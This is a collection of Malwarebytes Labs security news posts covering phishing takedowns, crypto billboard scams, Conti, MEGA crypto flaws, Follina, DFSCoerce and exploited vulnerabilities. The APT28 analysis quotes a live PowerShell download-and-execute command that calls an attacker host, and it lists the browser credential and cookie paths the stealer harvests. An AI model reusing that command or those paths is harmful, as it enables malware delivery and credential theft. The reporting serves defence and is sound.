IT NEWS

Police seize and dismantle massive phishing operation

Europol has coordinated a joint operation to arrest members of a cybercrime gang and effectively dismantle their campaigns that netted million in Euros. This operation also led the Belgian Police (Police Fédérale/Federale Politie) and the Dutch Police (Politie) to nine arrests, 24 house searches, and the seizure of firearms, ammunition, jewelry, electronic devices, cash, and cryptocurrency.

The group was involved in fraud, money laundering, phishing, and scams.

According to a Europol press release, the group’s modus operandi started with an email, text message, or private message containing a link to a phishing page.

Once recipients opened the link, they would be directed to a bogus bank website. Here, they were encouraged to enter their banking credentials. Money mules then used these credentials to cash out millions in Euros from victim accounts.

On top of fraud, the group was also involved in drug and possible firearms trafficking.

“Europol facilitated the information exchange, the operational coordination and provided analytical support for investigation,” reads the press release, revealing law enforcement involvement in the arrest operation. “During the operation, Europol deployed three experts to the Netherlands to provide real-time analytical support to investigators on the ground, forensics and technical expertise.”

The takedown of this phishing operation came months after Europol shut down the FluBot Android operation and the seizure of RaidForums, a hacking forum.

The post Police seize and dismantle massive phishing operation appeared first on Malwarebytes Labs.

Rogue cryptocurrency billboards go phishing for wallets

Billboards and digital real world advertising has raised many questions of privacy and anonymity in recent years. Until now, the primary concern has been (mostly) legal, yet potentially objectionable geolocation and user profiling. Bluetooth beacons work in tandem with geofenced billboards to send you offers. Stores follow your movements and tailor products accordingly, occasionally with very bad results. It’s such a common practice that you even see digital advertising used to track appearing in video games.

Attacks we’ve seen in the real world typically involve QR code stickers and take two main forms:

  • Letters or emails/chat app conversations which direct victims to Bitcoin ATMs. These attacks can often tie into money mule schemes.
  • Real world alteration/tampering of genuine QR codes. This can involve bogus QR code stickers placed over locations you’d expect to see a real code. Parking meters and car parks generally are prime targets for this type of scam.

We can now add rogue billboards to the list.

Beware of the party crashers

NFT NYC describes itself as “the leading annual non-fungible token event”. The 2022 meet-up is the fourth such event to take place. With NFTs hitting boiling point in the media, it’s natural to think scammers would turn their sights on the plundering of incredibly fungible apes and other items of a digital nature.

If you’re up to no good, and you know digital finance is filled with insecure coin-laden wallets and expensive jpegs, this is absolutely something you’re going to take an interest in.

Sure enough:

The screenshot is from a Discord channel, which says:

BE ALERT IF YOU ARE AT NFT NYC

Reports of scam billboards in NYC with QR codes leading to Wallet Drainer sites.

This is probably a good time to explain what a wallet drainer site is.

Of wallets and draining

Sadly, it seems nobody grabbed a photo of what these scam billboards look like. However, a “wallet drainer” is just another way of saying “phishing website”. There are three ways the majority of cryptocurrency phishes take place:

  1. Airdrop phishing. This can involve entering your wallet’s recovery phrase onto a fake website (don’t do this), or connecting your wallet directly to the phishing portal (don’t do this either).
  2. Bogus giveaways. These claim you’ll double your money, and often say they are endorsed by celebrities or Elon Musk.
  3. Rogue adverts. These bogus advertisements could lead you to either of the above, or even some completely unrelated technique.

People have confirmed in the replies to the original tweet that the theft here depended on victims scanning the code, and then clicking through to the phishing page. The phishing component depended on them manually entering their details into the fake website. It is not the case that simply visiting it would immediately drain funds or cause apes to go walkabout.

Rogue cryptocurrency billboards: A growing trend?

I’m wondering if this is the official cementing of rogue billboards as a digital finance scam technique. You may be surprised to learn this isn’t the first time someone has tried this.

Back in May, cryptocurrency exchange Binance warned of a rash of bogus billboards popping up in Turkey. Scam artists “plastered fake Binance billboards throughout the country”, many of which included a phone number answered by criminals behind the scheme.

The tactic used here was to convince unwary investors to hand over their seed/recovery phrases. Others were asked to register new accounts. Cryptocurrency scams involving new accounts tend to have funds deposited over time. Eventually the scammers have the victim transfer the funds to sites run exclusively by them. No matter which tactic is used, someone pulled in by the billboard has a strong chance of losing out.

This is clearly a technique which is working for phishers no matter the location. If you’re at an event or simply out and about and spot a cryptocurrency billboard, play it safe. Does the billboard mention a digital finance organisation? Check with the organisation if the URL is genuine. If you’re asked for seed/recovery phrases, don’t hand them over. Does the billboard make claims of doubling whatever you deposit? This is almost certainly a scam, especially if tied to a promotion from Elon Musk or TESLA.

Stay safe out there!

The post Rogue cryptocurrency billboards go phishing for wallets appeared first on Malwarebytes Labs.

Dial 311 for… cybersecurity emergencies?

Members of the Cybersecurity Advisory Committee of CISA (Cybersecurity and Infrastructure Security Agency) have proposed an emergency cybersecurity call line for small and medium-sized businesses (SMBs). Should the proposition be approved, SMBs would be able to call 311 in the event of a cybersecurity incident.

CISA’s cyberhygiene subcommittee head, George Stathakopoulos, originally floated the idea that CISA should “launch a 311 national campaign, to provide an emergency call line and clinics for assistance following cyber incidents for small and medium businesses.” The communications subcommittee also floated a similar idea.

CISA and other cybersecurity experts have pushed for more robust incident response reporting. In March, President Joe Biden signed the Strengthening American Cybersecurity Act, a cyber incident reporting bill requiring critical infrastructure operators to report a breach to CISA within 72 hours, and 24 hours if they made a ransomware payment.

CISA Executive Assistant Director for Cybersecurity Eric Goldstein bemoaned how damaging it is for CISA to have little data over ransomware attacks in the US. Speaking to attendees in RSA, Goldstein was quoted saying:

“A tiny fraction of ransomware infections are reported to the government and the problem is getting worse because we don’t even know what that actual number is. We have no idea the actual denominator of ransomware instructions that are occurring across the country on any given day.”

The post Dial 311 for… cybersecurity emergencies? appeared first on Malwarebytes Labs.

Conti ransomware group’s pulse stops, but did it fake its own death?

The dark web leak site used by the notorious Conti ransomware gang has disappeared, along with the chat function it used to negotiate ransoms with victims. For as long as this infrastructure is down the group is unable to operate and a significent threat is removed from the pantheon of ransomware threats.

conti leak site is down
The Conti leak site is down (June 22, 2022)

Ransomware gangs like Conti use the threat of leaking stolen data on their dark web sites to extort enormous ransoms from their victims, making the sites a vital cog in the ransomware machine.

While the cause of the site’s disappearance isn’t known for sure, and criminal dark web sites are notoriously flaky, there is good reason to suspect that Conti has gone permanently.

However, while anything that stops Conti from terrorising businesses, schools, and hospitals is welcome, the disappearance of its leak site is unlikely to make potential ransomware victims any safer, sadly.

As we explained in our May ransomware review, recent research by Advintel suggests that Conti has spent the last few months executing a bizarre plan to fake its own death. If that is what’s happened, then the gang’s members have simply dispersed to other ransomware “brands” that are either operated by the Conti gang or affiliated to it.

Conti—as bad as they come

The gang behind Conti ransomware (called WizardSpider, although rarely referred to by that name) is believed to be based in Russia, and first appeared in 2020. The FBI recently called it “the costliest strain of ransomware ever documented,” and the US Department of State is offering a reward of up to $10 million for “information leading to the identification and/or location of any individual(s) who hold a key leadership position in the Conti ransomware variant transnational organized crime group.”

Conti has been used in a number of high profile attacks, including a devastating assault on Ireland’s Health Service executive on May 14, 2021. The attack disrupted healthcare in Ireland for months and the recovery effort could end up costing the country more than $100 million.

The real cost of the attack was measured in human suffering though. Speaking to Malwarebytes Labs, a doctor in one of the affected hospitals described how a 21st-century healthcare system deprived of it’s computers is brought to its knees. The attack caused enormous unnecessary suffering for both patients and healthcare professionals, and triggered hundreds of thousands of appointments to be cancelled.

The doctor’s brutal assessment of the Conti gang? “I think they lost their humanity.”

Faking its own death

According to Advintel, the Conti gang sealed its fate in February when it published a message in support of Russia’s invasion of Ukraine, declaring its “full support of Russian government.” By aligning itself to the Russian state it had made itself the subject of sanctions. Victims were not prepared to run the risk that their ransom payments might be treated as sanctions violations and Conti’s income dried up.

Ransomware gangs often react to trouble by going dark, or with ham-fisted attempts to pretend they’ve retired. These retirements are often quickly followed by the sudden appearance of a brand new ransomware gang that is obviously just the old gang working under a new name.

Advintel’s research suggested that Conti was aware of this pattern and determined to try something different. Instead of disappearing and then popping up a week later under a new name, the group created and operated new brands—Advintel names KaraKurt, BlackByte, and BlackBasta as examples—before retiring the Conti name, to make the transition less obvious. In addition to creating these new brands, it also dispersed parts of its workforce into existing gangs it had a relationship with, such as Hive and ALPHV.

To complete the deception, it maintained a skeleton crew that carried out extremely noisy, headline-grabbing attacks on Cost Rica, and continued to operate the leak site until the last moment.

Malwarebytes Threat Intelligence was able to independently confirm that Conti sent an internal announcement about its retirement to affiliates at the end of May, and that its internal chat servers stopped working around the same time.

The site had been inactive for 28 days before it disappeared, with the last new leak appearing on May 25. As our May ransomware report revealed, despite the noise it generated from its attacks on Costa Rica, Conti’s activity was significantly depressed in May, while the activity of gangs with alleged links to Conti increased, driven largely by the rise of BlackBasta.

Known ransomware attacks in May 2022
Known ransomware attacks in May 2022

The post Conti ransomware group’s pulse stops, but did it fake its own death? appeared first on Malwarebytes Labs.

MEGA claims it can’t decrypt your files. But someone’s managed to…

MEGA, the cloud storage provider and file hosting service, is very proud of its end-to-end encryption. It says it couldn’t decrypt your stored files, even if it wanted to.

“All your data on MEGA is encrypted with a key derived from your password; in other words, your password is your main encryption key. MEGA does not have access to your password or your data. Using a strong and unique password will ensure that your data is protected from being hacked and gives you total confidence that your information will remain just that – yours.”

But there’s a problem. A Swiss team of researchers has just proved those claims wrong.

And that’s not all. The research went one step further, finding that an attacker could insert malicious files into the storage, passing all authenticity checks of the client.

Cryptography flaws

Researchers at the Department of Computer Science of the ETH Zurich in Zurich, Switzerland reviewed the security of MEGA and found significant issues in how it uses cryptography.

These findings could lead to devastating attacks on the confidentiality and integrity of user data in the MEGA cloud.

Key hierarchy

The MEGA client derives an authentication key and an encryption key from the password. The authentication key identifies users to MEGA. The encryption key encrypts a randomly generated master key, which in turn encrypts other key material of the user. Every account has a set of asymmetric keys: An RSA key pair for sharing data, a Curve25519 key pair for exchanging chat keys for MEGA’s chat functionality, and an Ed25519 key pair for signing the other keys. Furthermore, the client generates a new key for every file or folder (collectively referred to as nodes) uploaded by the user.

Long story short, all the keys are derived in one way or another from the password. And all the keys get stored on MEGA’s servers to support access from multiple devices.

Ciphertext

Ciphertext is encrypted text transformed from plaintext using an encryption algorithm. The researchers built two attacks based on the lack of integrity protection of ciphertexts containing keys, and two further attacks to breach the integrity of file ciphertexts and allow a malicious service provider to insert chosen files into a user’s cloud storage.

Attacks

Due to the flawed integrity protection, a malicious service provider can recover a user’s private RSA share key (used to share file and folder keys) over 512 login attempts. The number is 512 because of the RSA-CRT implementation used by MEGA clients to build an oracle that leaks one bit of information per login attempt about a factor of the RSA modulus.

As a result the malicious service provider can recover any plaintext encrypted with AES-ECB under a user’s master key. This includes all node keys used for encrypting files and folders. As a consequence, the confidentiality of all user data protected by these keys, such as files and chat messages, is lost.

Based on the first two attacks, a malicious service provider can construct an encrypted file. The user cannot demonstrate that they didn’t upload the forged data because the files and keys are indistinguishable from genuinely uploaded ones. It needs no further explanation that introducing a malicious file in such an attack could further compromise not only the user’s system, but also for those the user has shared their files or folders with.

MEGA’s response

MEGA acknowledged the issue on March 24, 2022, and released patches on June 21, 2022, awarding the researchers a bug bounty. But MEGA’s fix differs greatly from what the researchers proposed, patching only for the first attack alone since the other attacks rely on the first one.

Since that does not fix the key reuse issue, lack of integrity checks, and other systemic problems the researchers identified, this remains a source of concern for them.

As a regular MEGA user there is no reason to worry about these flaws, especially if you haven’t logged in more than 512 times. An attacker would need to have control over MEGA’s API servers or TLS connections without being noticed to perform any of these attacks.

Anyone interested in more technical details, can read the researcher’s paper.

The post MEGA claims it can’t decrypt your files. But someone’s managed to… appeared first on Malwarebytes Labs.

Watch out for the email that says “You have a new voicemail!”

A phishing campaign is using voicemail notification messages to go after victims’ Office 365 credentials.

According to researchers at ZScaler, the campaign uses spoofed emails with an HTML attachment that contains encoded javascript.

The email claims that you have a new voicemail and that you can listen to the message by clicking on the attachment. To add credibility, the name of the attachment starts with a music note character like f.e. ♫ to make it look like a sound clip. In reality, it is an HTML file with obfuscated javascript embedded.

The javascript uses the windows.location.replace method to redirect the target to a specially crafted phishing page. The access to the page is behind a reCAPTCHA, probably to keep out the bots, particularly any automated URL analysis tools.

Spoofed email

Email spoofing basically comes down to sending emails with a false sender address. This can be used in various ways by attackers. Obviously pretending to be someone else can have its advantages especially if that someone else holds a position of power or trust with regards to the receiver.

In this campaign the threat actors use a name in the “From” field of the email aligned with the targeted organization’s name. An internal mail is more likely to be trusted by the receiver. Analysis of the email headers shows that the attacker leveraged email servers located in Japan.

Targets

The final credential phishing page attempts to steal the Office 365 credentials of the users by presenting them with a fake login screen. The redirection URL includes the target’s email address in base64 encoded, likely so the attackers will be able to match the victim and their login credentials.

The researchers found the campaign targeting organizations in the US military, security software developers and providers, healthcare and pharmaceutical, and supply-chain organizations in manufacturing and shipping.

How to avoid being phished

  • Do not open unverified email attachments. If someone you know sends you an attachment you’re not expecting, check it is really them via another contact method.
  • Do not enter your credentials before checking the actual URL of the site.
  • If you use a password manager that autofills your login details, it will not enter your credentials on a phishing site because it will have a different URL. This is a really handy giveaway that something is up.
  • Enable 2-factor authentication (2FA). If you hand over your password to a phishing page, the phisher can’t do much with it while you’re protected with 2FA. This isn’t foolproof though, as some phishing sites will also try to steal your 2FA codes.

Stay safe, everyone!

The post Watch out for the email that says “You have a new voicemail!” appeared first on Malwarebytes Labs.

7-Zip gets Mark of the Web feature, increases protection for users

One of the most popular zip programs around, 7-Zip, now offers support for “Mark of the Web” (MOTW), which gives users better protection from malicious files.

This is good news. But what does that actually mean?

In the bad old days, opening up a downloaded document could be a fraught exercise. Malicious files would often have full permission from the system to do whatever they wanted. Compromised PCs were the inevitable end result, and infected attachments were extremely popular. Outside of regular security tools, there often wasn’t much else available to help stop the flow.

Microsoft’s file block feature in 2007 meant network administrators could lock down any attempt to open specific file types. Unfortunately, this was a little too restrictive for some users. Files couldn’t be opened, even in cases where the user knew they were safe.

Microsoft changed things up a little in 2010, with Protected View.

Protected View: what is it?

Every time you download a spreadsheet or Word document and open it up, some checking takes place in the background. Downloaded files produce a yellow bar with the following message:

Protected View: Be careful. Files from the internet can contain viruses. Unless you need to edit, it’s safer to stay in Protected View.

This isn’t too different to the old file block feature, with a few key differences. Firstly, you can actually look at the document you want to open. As it is locked into a read-only mode, it can’t do anything malicious to your system. Secondly, users now have the option to enable editing. While there are other potentially dangerous aspects to opening downloaded files, Microsoft has solutions for those too. There is, of course, something telling these programs to warn you about potentially dangerous files. This is where MOTW comes into play.

How does Mark of the Web help?

MOTW is perhaps most recently known for blocking VBA code from running in Office. When a file is downloaded, Windows adds a ZoneId to the file which is responsible for the warning message(s). When the system detects the mark, the yellow bar is replaced by a red one. Unlike it’s yellow counterpart, there is no enable content button. Those files are done, with no way back.

Right click a file you’ve downloaded, and in General properties you should see a message which reads:

This file came from another computer and might be blocked to help protect this computer.

This exists thanks to MOTW.

The mark doesn’t exist on the file itself, which is left untouched. Originally an Internet Explorer security feature, you’ll now find it keeping you from harm’s way across the Microsoft product range.

Is this new addition a benefit for a zip program?

Absolutely. As noted by Bleeping Computer, MOTW didn’t apply to files extracted with 7-Zip. As a result, you’d have Office files opening as if you’d created them yourself with no Protected View in sight.

With this now enabled in the latest version of 7-Zip, some key Windows security precautions are now back in place.

There are some caveats to this story. As we know, not everybody pays attention to security warnings. Computer users routinely ignore all manner of security alerts from their operating system, browser, and security tools. The design and placement of warnings can further deter people paying attention to them. On top of all that, bogus security warnings can further make things confusing for users.

No matter how many warning messages are displayed, some people will still click “Enable” on files they shouldn’t. Even so, opening downloaded files with restrictions applied from the get-go can only be a good thing.

The post 7-Zip gets Mark of the Web feature, increases protection for users appeared first on Malwarebytes Labs.

Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine

This blog post was authored by Hossein Jazi and Roberto Santos.

In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.

APT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and US organizations, including US nuclear facilities.

On June 20, 2022, Malwarebytes Threat Intelligence identified a document that had been weaponized with the Follina (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by Google. The discovery was also made independently by CERT-UA.

Follina is a recently-discovered zero-day exploit that uses the ms-msdt protocol to load malicious code from Word documents when they are opened. This is the first time we’ve observed APT28 using Follina in its operations.

The malicious document

The maldoc’s filename, Nuclear Terrorism A Very Real Threat.rtf, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict.

The content of the document is an article from the Atlantic Council called “Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions” published on May 10 this year.

A malicious document asks "Will Putin use nuclear weapons in Ukraine?"
The lure asks “Will Putin use nuclear weapons in Ukraine?”

The maldoc is an RTF file compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268.frge.io/article.html.

malicious html document
The malicious HTML document

The HTML file uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme. The decoded script uses cmd to run PowerShell code that downloads and executes the final payload:

"C:WINDOWSsystem32cmd.exe" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command "& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:Users$ENV:UserNameSQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:Users$ENV:UserNamedocx.exe";Start-Process "C:Users$ENV:UserNamedocx.exe"}"

Payload Analysis

The final payload is a variant of a stealer APT28 has used against targets in Ukraine before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup.

image 6
In older versions of the stealer, a fake error message distracted users

The variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.

A side-by-side comparison of two versions of the APT28 stealer
A side-by-side comparison of two versions of the APT28 stealer

As with the previous variant, the stealer’s main pupose is to steal data from several popular browsers.

Google Chrome and Microsoft Edge

The malware steals any website credentials (username, password, and url) users have saved in the browser by reading the contents of %LOCALAPPDATA%GoogleChromeUser DataDefaultLogin Data.

Debugging session showing how attackers are capable of stealing credentials
Debugging session showing how attackers are capable of stealing credentials

In a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing %LOCALAPPDATA%GoogleChromeUser DataDefaultNetworkCookies.

Code snippet in charge of cookies steal activity (Google Chrome)
Cookie stealing code (Google Chrome)

Stolen cookies can sometimes be used to break into websites even if the username and password aren’t saved to the browser.

The code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.

Firefox

This malware can also steal data from Firefox. It does this by iterating through every profile looking for the cookies.sqlite file that stores the cookies for each user.

Cookie stealing in Firefox
Sysmon capturing access to cookies.sqlite file

In the case of passwords, the attackers attempt to steal logins.json, key3.db, key4.db, cert8.db, cert9.db, signons.sqlite.

image 11
Attackers will grab also passwords from Firefox

These files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (signons.sqlite, key3.db and cert8.db are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.

Exfiltrating data

The malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.

IMAP login event
The IMAP login event

The old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc[.]com. Interestingly both are located in Dubai.

It’s likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.

Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.

For more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has targeted Russia repeatedly since Ukraine invasion.

Protection

Malwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.

nebula protects against APT28 campaign

IOCs

Maldoc:
Nuclear Terrorism A Very Real Threat.rtf
daaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01

Remote template (Follina):
http://kitten-268.frge[.]io/article.html

Stealer:
http://kompartpomiar[.]pl/grafika/docx.exe
2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933

C2:
www.specialityllc[.]com

The post Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine appeared first on Malwarebytes Labs.

DFSCoerce, a new NTLM relay attack, can take control over a Windows domain

A researcher has published a Proof-of-Concept (PoC) for an NTLM relay attack dubbed DFSCoerce. The method leverages the Distributed File System: Namespace Management Protocol (MS-DFSNM) to seize control of a Windows domain.

Active Directory

A directory service is a hierarchical arrangement of objects which is structured in a way that makes access easy. Windows Active Directory (AD) is a directory service provided by Microsoft and developed for Windows domains. Basically, it is a central database which gets contacted before a user is granted access to a resource or a service. Organizations primarily use AD to perform authentication and authorization.

Many large organizations depend on Windows Active Directory (AD) to maintain order in the mountain of work involved in managing users, computers, permissions, and file servers.

NTLM

NTLM is short for New Technology LAN Manager. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN). NTLM is a protocol that uses a challenge and response method to authenticate a client.

  1. First, the client establishes a network path to the server and sends a NEGOTIATE_MESSAGE advertising its capabilities.
  2. Next, the server responds with CHALLENGE_MESSAGE which is used to establish the identity of the client.
  3. Finally, the client responds to the challenge with an AUTHENTICATE_MESSAGE.

The NTLM protocol uses one or both of two hashed password values. Both passwords are also stored on the server (or domain controller). And through a lack of salting they are password equivalent, meaning that if you grab the hash value from the server, you can authenticate without knowing the actual password.

NTLM relay attack

NTLM relay attacks allow attackers to steal hashed versions of user passwords, and relay clients’ credentials in an attempt to authenticate to servers. They use a Machine-in-the-Middle method that allows threat actors to sit between clients and servers and intercept and relay validated authentication requests in order to gain unauthorized access to network resources.

PetitPotam is an example of an NTLM relay attack that prompted Microsoft to send out an advisory for system administrators to stop using the now deprecated Windows NT LAN Manager (NTLM) to thwart an attack. PetitPotam used the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) protocol to execute an NTLM attack.

The DFSCoerce script is based on the PetitPotam exploit, but instead of using MS-EFSRPC, it uses MS-DFSNM, a protocol that allows the Windows Distributed File System (DFS) to be managed over an remote procedure call (RPC) interface.

Tweet Filip Dragovic
Tweet by the researcher that discovered DFSCoerce

Other methods

Other methods threat actors could use include the MS-RPRN, and the MS-FSRVP protocols. And now the researcher has added MS-DFSNM to the list of applicable protocols. A list which researchers expect to grow even more. The Distributed File System Namespace Management (DFSNM) protocol is one of a collection of protocols that group shares that are located on different servers by combining various storage media into a single logical namespace. The DFS namespace is a virtual view of the share. When a user views the namespace, the directories and files in it appear to reside on a single share.

Mitigation

While Microsoft has issued patches for NTLM attacks in the past, it is unclear whether it will do the same for DFSNM to thwart the DFSCoerce method.

The advice for system administrators is to follow Microsoft’s advisory on how to prevent NTLM relay attacks. The Microsoft advisory, triggered by PetitPotam, will also prevent DFSCoerce and other NTLM attack methods. The recommendation basically says to disable the deprecated NTLM authentication where possible and use the Extended Protection for Authentication (EPA). Extended Protection for Authentication helps protect against MITM attacks, in which an attacker intercepts a client’s credentials and forwards them to a server.

Stay safe, everyone!

The post DFSCoerce, a new NTLM relay attack, can take control over a Windows domain appeared first on Malwarebytes Labs.

Security vulnerabilities: 5 times that organizations got hacked

Businesses and governments these days are relying on dozens of different Software-as-a-Service (SaaS) applications to run their operations — and it’s no secret that hackers are always looking for security vulnerabilities in them to exploit.

According to research by BetterCloud, the average company with 500 to 999 employees uses about 93 different SaaS applications, with that number rising to 177 for companies with over 1000 employees.

Coupled with the fact that vendors release thousands of updates each year to patch security vulnerabilities in their software, it’s not surprising that businesses and governments are struggling to keep up with the volume of security vulnerabilities and patches.

And lo and behold, despite the best efforts of governments and businesses around the globe, hackers still managed to exploit multiple security vulnerabilities in 2021.

In this post, we’ll take a look at five times governments and businesses got hacked thanks to security vulnerabilities in 2021.

1.   APT41 exploits Log4Shell vulnerability to compromise at least two US state governments

First publicly announced in early December 2021, Log4shell (CVE-2021-44228) is a critical security vulnerability in the popular Java library Apache Log4j 2. The vulnerability is simple to execute and enables attackers to perform remote code execution.

A patch for Log4Shell was released on 9 December 2021, but within hours of the initial December 10 2021 announcement, hacker groups were already racing to exploit Log4Shell before businesses and governments could patch it — and at least one of them was successful.

Shortly after the advisory, the Chinese state-sponsored hacking group APT41 exploited Log4Shell to compromise at least two US state governments, according to research from Mandiant. Once they gained access to internet-facing systems, APT41 began a months-long campaign of reconnaissance and credential harvesting.

2.  North Korean government backed-groups exploit Chrome zero-day vulnerability

On February 10 2022, Google’s Threat Analysis Group (TAG) discovered that two North Korean government backed-groups exploited a vulnerability (CVE-2022-0609) in Chrome to attack over 250 individuals working for various media, fintech, and software companies.

The activities of the two groups have been tracked as Operation Dream Job and AppleJeus, and both of them used the same exploit kit to collect sensitive information from affected systems.

How does it work, you ask? Well, hackers exploited a use-after-free (UAF) vulnerability in the Animation component of Chrome — which, just like Log4Shell, allows hackers to perform remote code execution.

3.  Hackers infiltrate governments and companies with ManageEngine ADSelfService Plus vulnerability

From September 17 through early October, hackers successfully compromised at least nine companies and 370 servers by exploiting a vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution.

So, what happens after hackers exploited this vulnerability? You guessed it — remote code execution. Specifically, hackers uploaded a payload to a victims network that installed a webshell, a malicious script that grants hackers a persistent gateway to the affected device.

From there, hackers moved laterally to other systems on the network, exfiltrated any files they pleased, and even stole credentials.

4.  Tallinn-based hacker exploits Estonian government platform security vulnerabilities

In July 2021, Estonian officials announced that a Tallinn-based male had gained access to KMAIS, Estonia’s ID-document database, where he downloaded the government ID photos of 286,438 Estonians.

To do this, the hacker exploited a vulnerability in KMAIS that allowed him to obtain a person’s ID photo using queries. Specifically, KMAIS did not sufficiently check the validity of the query received — and so, using fake digital certificates, the suspect could download the photograph of whoever he was pretending to be.

5.  Russian hackers exploit Kaseya security vulnerabilities

Kaseya, a Miami-based software company, provides tech services to thousands of businesses over the world — and on July 2 2021, Kaseya CEO Fred Voccola had an urgent message for Kaseya customers: shut down your servers immediately.

The urgency was warranted. Over 1,500 small and midsize businesses had just been attacked, with attackers asking for $70 million in payment.

A Russian-based cybergang known as REvil claimed responsibility for the attack. According to Hunteress Labs, REvil exploited a zero-day (CVE-2021-30116) and performed an authentication bypass in Kaseya’s web interface — allowing them to deploy a ransomware attack on MSPs and their customers.

Organizations need a streamlined approach to vulnerability assessment

Hackers took advantage of many security vulnerabilities in 2021 to breach an array of governments and businesses.

As we broke down in this article, hackers can range from individuals to whole state-sponsored groups — and we also saw how vulnerabilities themselves can appear in just about any piece of software regardless of the industry.

And while some vulnerabilities are certainly worse than others, the sheer volume of vulnerabilities out there makes it difficult to keep up with the volume of security patches. With the right vulnerability management and patch management, however, your organization can find (and correct) weak points that malicious hackers, viruses, and other cyberthreats want to attack.

Want to learn more about different vulnerability and patch management tools? Visit our Vulnerability and Patch Management page or read the solution brief.

The post Security vulnerabilities: 5 times that organizations got hacked appeared first on Malwarebytes Labs.